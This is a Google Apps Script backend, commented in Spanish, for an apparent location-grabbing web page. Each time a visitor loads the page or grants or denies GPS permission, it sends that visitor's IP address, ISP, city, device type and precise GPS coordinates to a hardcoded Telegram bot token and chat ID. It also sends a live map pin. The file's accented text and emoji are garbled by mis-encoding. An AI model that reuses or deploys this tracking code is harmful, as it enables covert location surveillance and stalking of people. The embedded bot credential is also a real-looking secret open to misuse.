// ============================================
// SCRIPT PARA TELEGRAM BOT
// EnvГ­a notificaciГіn a tu Telegram cada GPS aceptado
// ============================================

/**
 * CONFIGURACIГ“N - EDITA AQUГЌ
 */
const TELEGRAM_CONFIG = {
  botToken: '8607851610:AAE1gAl2tHeL6kYN2jxB6QOD87gALi86-S4',
  chatId: '7558822184',
  
  notificarSinGPS: true, // Notifica TODO (visitas, GPS aceptado, rechazado)
  incluirMapa: true
};

/**
 * FunciГіn que recibe datos vГ­a POST
 */
function doPost(e) {
  try {
    var data = JSON.parse(e.postData.contents);
    
    // Solo procesar eventos importantes
    if (data.event === 'gps_granted' || data.event === 'gps_granted_retry') {
      enviarNotificacionGPS(data);
      
    } else if (data.event === 'page_load' && TELEGRAM_CONFIG.notificarSinGPS) {
      enviarNotificacionVisita(data);
      
    } else if (data.event === 'gps_denied' && TELEGRAM_CONFIG.notificarSinGPS) {
      enviarNotificacionRechazo(data);
    }
    
    return ContentService.createTextOutput('OK');
    
  } catch (error) {
    Logger.log('Error: ' + error.toString());
    return ContentService.createTextOutput('ERROR: ' + error.toString());
  }
}

/**
 * Enviar notificaciГіn cuando se acepta GPS
 */
function enviarNotificacionGPS(data) {
  var lat = data.gpsData?.latitude || 0;
  var lng = data.gpsData?.longitude || 0;
  
  // Datos de red
  var ip = data.networkInfo?.ip || 'N/A';
  var isp = data.networkInfo?.isp || 'N/A';
  var city = data.networkInfo?.city || 'N/A';
  var region = data.networkInfo?.region || 'N/A';
  var country = data.networkInfo?.country || 'N/A';
  var device = data.deviceType || 'N/A';
  
  // Fecha y hora
  var fecha = new Date();
  var fechaStr = fecha.toLocaleDateString('es-AR');
  var horaStr = fecha.toLocaleTimeString('es-AR');
  
  // Link a Google Maps
  var mapUrl = 'https://www.google.com/maps?q=' + lat + ',' + lng;
  
  // Construir mensaje
  var mensaje = 
    'рџ”ґ *Nueva ubicaciГіn GPS*\n' +
    'в”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓ\n\n' +
    'рџ“… *Fecha:* ' + fechaStr + ' - ' + horaStr + '\n\n' +
    'рџЊђ *INFORMACIГ“N DE RED*\n' +
    'в”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓ\n' +
    'рџ”№ IP: `' + ip + '`\n' +
    'рџ”№ ISP: ' + isp + '\n' +
    'рџ”№ Ciudad: ' + city + '\n' +
    'рџ”№ RegiГіn: ' + region + '\n' +
    'рџ”№ PaГ­s: ' + country + '\n' +
    'рџ”№ Dispositivo: ' + device + '\n\n' +
    'вњ… *GPS ACEPTADO*\n' +
    'в”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓ\n' +
    'рџ“Ќ Lat: `' + lat + '`\n' +
    'рџ“Ќ Lng: `' + lng + '`\n' +
    'рџ“Џ PrecisiГіn: ' + (data.gpsData?.accuracy || 'N/A') + ' metros\n\n' +
    'рџ—єпёЏ [Ver en Google Maps](' + mapUrl + ')';
  
  // Enviar mensaje
  enviarMensajeTelegram(mensaje);
  
  // Si estГЎ configurado, enviar ubicaciГіn interactiva
  if (TELEGRAM_CONFIG.incluirMapa) {
    enviarUbicacionTelegram(lat, lng);
  }
}

/**
 * Enviar notificaciГіn de visita (sin GPS)
 */
function enviarNotificacionVisita(data) {
  var fecha = new Date().toLocaleString('es-AR');
  
  var mensaje = 
    'рџЊђ *Nueva visita*\n' +
    'в”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓ\n\n' +
    'рџ“… ' + fecha + '\n' +
    'рџ”№ IP: `' + (data.networkInfo?.ip || 'N/A') + '`\n' +
    'рџ”№ ISP: ' + (data.networkInfo?.isp || 'N/A') + '\n' +
    'рџ”№ Ciudad: ' + (data.networkInfo?.city || 'N/A') + '\n' +
    'рџ”№ Dispositivo: ' + (data.deviceType || 'N/A') + '\n\n' +
    'вЏі Esperando permiso GPS...';
  
  enviarMensajeTelegram(mensaje);
}

/**
 * Enviar notificaciГіn de rechazo GPS
 */
function enviarNotificacionRechazo(data) {
  var fecha = new Date().toLocaleString('es-AR');
  
  var mensaje = 
    'вќЊ *GPS Rechazado*\n' +
    'в”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓв”Ѓ\n\n' +
    'рџ“… ' + fecha + '\n' +
    'рџ”№ IP: `' + (data.networkInfo?.ip || 'N/A') + '`\n' +
    'рџ”№ Ciudad: ' + (data.networkInfo?.city || 'N/A') + '\n\n' +
    'вљ пёЏ Usuario denegГі el permiso';
  
  enviarMensajeTelegram(mensaje);
}

/**
 * Enviar mensaje de texto a Telegram
 */
function enviarMensajeTelegram(texto) {
  var url = 'https://api.telegram.org/bot' + TELEGRAM_CONFIG.botToken + '/sendMessage';
  
  var payload = {
    chat_id: TELEGRAM_CONFIG.chatId,
    text: texto,
    parse_mode: 'Markdown',
    disable_web_page_preview: false
  };
  
  var options = {
    method: 'post',
    contentType: 'application/json',
    payload: JSON.stringify(payload),
    muteHttpExceptions: true
  };
  
  try {
    var response = UrlFetchApp.fetch(url, options);
    Logger.log('Mensaje enviado a Telegram');
  } catch (error) {
    Logger.log('Error enviando a Telegram: ' + error.toString());
  }
}

/**
 * Enviar ubicaciГіn interactiva a Telegram
 */
function enviarUbicacionTelegram(lat, lng) {
  var url = 'https://api.telegram.org/bot' + TELEGRAM_CONFIG.botToken + '/sendLocation';
  
  var payload = {
    chat_id: TELEGRAM_CONFIG.chatId,
    latitude: lat,
    longitude: lng
  };
  
  var options = {
    method: 'post',
    contentType: 'application/json',
    payload: JSON.stringify(payload),
    muteHttpExceptions: true
  };
  
  try {
    UrlFetchApp.fetch(url, options);
    Logger.log('UbicaciГіn enviada a Telegram');
  } catch (error) {
    Logger.log('Error enviando ubicaciГіn: ' + error.toString());
  }
}

/**
 * FunciГіn de prueba
 */
function testTelegram() {
  var mensajePrueba = 
    'вњ… *Test OberГЎ Analytics*\n\n' +
    'Si recibes este mensaje, el bot estГЎ configurado correctamente.\n\n' +
    'рџљЂ Listo para recibir notificaciones';
  
  enviarMensajeTelegram(mensajePrueba);
  Logger.log('Mensaje de prueba enviado');
}
